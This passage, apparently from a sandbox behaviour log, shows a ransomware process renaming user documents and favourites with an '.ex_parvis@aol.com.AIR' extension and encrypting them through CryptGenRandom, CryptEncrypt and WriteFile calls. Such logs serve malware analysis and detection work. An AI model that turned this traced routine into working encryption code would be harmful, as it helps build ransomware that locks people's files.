lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf.12781717671972518758.ex_parvis@aol.com.AIR" [0167.412] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\sz6f1bo5fkg0yvfi5q7.rtf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\sz6f1bo5fkg0yvfi5q7.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.414] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\SZ6F1bo5Fkg0YVFI5Q7.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\sz6f1bo5fkg0yvfi5q7.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548 [0167.414] GetProcessHeap () returned 0x2e0000 [0167.414] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0167.414] GetFileSizeEx (in: hFile=0x548, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=63148) returned 1 [0167.414] SetFilePointer (in: hFile=0x548, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xf6ac [0167.415] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.415] GetProcessHeap () returned 0x2e0000 [0167.415] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.415] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.415] WriteFile (in: hFile=0x548, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.416] WriteFile (in: hFile=0x548, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.416] WriteFile (in: hFile=0x548, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.416] ReadFile (in: hFile=0x548, lpBuffer=0x3b2410, nNumberOfBytesToRead=0xf6ac, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0xf6ac, lpOverlapped=0x0) returned 1 [0167.417] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.418] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.418] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc", dwFileAttributes=0x80) returned 1 [0167.418] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc") returned 71 [0167.418] GetProcessHeap () returned 0x2e0000 [0167.418] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf4) returned 0x336dd8 [0167.418] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc" [0167.418] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc.12781717671972518758.ex_parvis@aol.com.AIR" [0167.418] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\qwc o a5mragdwd.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\qwc o a5mragdwd.doc.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.420] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\qwC o a5mragDWD.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\qwc o a5mragdwd.doc.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548 [0167.420] GetProcessHeap () returned 0x2e0000 [0167.420] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.420] GetFileSizeEx (in: hFile=0x548, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=27781) returned 1 [0167.420] SetFilePointer (in: hFile=0x548, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x6c85 [0167.421] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.421] GetProcessHeap () returned 0x2e0000 [0167.421] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.421] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.421] WriteFile (in: hFile=0x548, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.422] WriteFile (in: hFile=0x548, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.422] WriteFile (in: hFile=0x548, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.422] ReadFile (in: hFile=0x548, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x6c85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x6c85, lpOverlapped=0x0) returned 1 [0167.422] SetFilePointer (in: hFile=0x548, lDistanceToMove=-27781, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.422] WriteFile (in: hFile=0x548, lpBuffer=0x3b90a0*, nNumberOfBytesToWrite=0x6c85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b90a0*, lpNumberOfBytesWritten=0x2acf9c8*=0x6c85, lpOverlapped=0x0) returned 1 [0167.423] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.423] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.423] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt", dwFileAttributes=0x80) returned 1 [0167.423] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt") returned 63 [0167.423] GetProcessHeap () returned 0x2e0000 [0167.423] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3ac428 [0167.423] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt" [0167.424] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt.12781717671972518758.ex_parvis@aol.com.AIR" [0167.424] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\oats_ep.ppt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\oats_ep.ppt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.429] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vpoDWivY35\\oats_eP.ppt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vpodwivy35\\oats_ep.ppt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x548 [0167.429] GetProcessHeap () returned 0x2e0000 [0167.429] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0167.429] GetFileSizeEx (in: hFile=0x548, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=72296) returned 1 [0167.429] SetFilePointer (in: hFile=0x548, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x11a68 [0167.430] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.430] GetProcessHeap () returned 0x2e0000 [0167.430] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.430] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.430] WriteFile (in: hFile=0x548, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.431] WriteFile (in: hFile=0x548, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.431] WriteFile (in: hFile=0x548, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.431] ReadFile (in: hFile=0x548, lpBuffer=0x3b2410, nNumberOfBytesToRead=0x11a68, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b2410*, lpNumberOfBytesRead=0x2acf9c8*=0x11a68, lpOverlapped=0x0) returned 1 [0167.433] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb163f970, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb163f970, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b18e8 [0167.433] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.433] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.434] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", dwFileAttributes=0x80) returned 1 [0167.434] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 68 [0167.434] GetProcessHeap () returned 0x2e0000 [0167.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xee) returned 0x31fae0 [0167.434] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" [0167.434] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.434] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.437] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c [0167.437] GetProcessHeap () returned 0x2e0000 [0167.437] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0167.437] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=226) returned 1 [0167.437] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xe2 [0167.437] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.437] GetProcessHeap () returned 0x2e0000 [0167.437] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.437] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.438] WriteFile (in: hFile=0x54c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.439] WriteFile (in: hFile=0x54c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.439] WriteFile (in: hFile=0x54c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.439] ReadFile (in: hFile=0x54c, lpBuffer=0x3ac428, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac428*, lpNumberOfBytesRead=0x2acf9c8*=0xe2, lpOverlapped=0x0) returned 1 [0167.439] SetFilePointer (in: hFile=0x54c, lDistanceToMove=-226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.439] WriteFile (in: hFile=0x54c, lpBuffer=0x3ac518*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac518*, lpNumberOfBytesWritten=0x2acf9c8*=0xe2, lpOverlapped=0x0) returned 1 [0167.439] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.439] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.439] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", dwFileAttributes=0x80) returned 1 [0167.440] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 66 [0167.440] GetProcessHeap () returned 0x2e0000 [0167.440] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xea) returned 0x336dd8 [0167.440] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" [0167.440] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.440] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.443] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c [0167.443] GetProcessHeap () returned 0x2e0000 [0167.443] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.443] GetFileSizeEx (in: hFile=0x54c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=236) returned 1 [0167.443] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xec [0167.443] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.443] GetProcessHeap () returned 0x2e0000 [0167.443] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.443] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.443] WriteFile (in: hFile=0x54c, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.444] WriteFile (in: hFile=0x54c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.444] WriteFile (in: hFile=0x54c, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.445] ReadFile (in: hFile=0x54c, lpBuffer=0x336dd8, nNumberOfBytesToRead=0xec, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesRead=0x2acf9c8*=0xec, lpOverlapped=0x0) returned 1 [0167.445] SetFilePointer (in: hFile=0x54c, lDistanceToMove=-236, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.445] WriteFile (in: hFile=0x54c, lpBuffer=0x31fae0*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesWritten=0x2acf9c8*=0xec, lpOverlapped=0x0) returned 1 [0167.445] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.445] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.445] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x80) returned 1 [0167.445] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 58 [0167.445] GetProcessHeap () returned 0x2e0000 [0167.445] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xda) returned 0x3a7428 [0167.445] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" [0167.445] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0167.446] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS 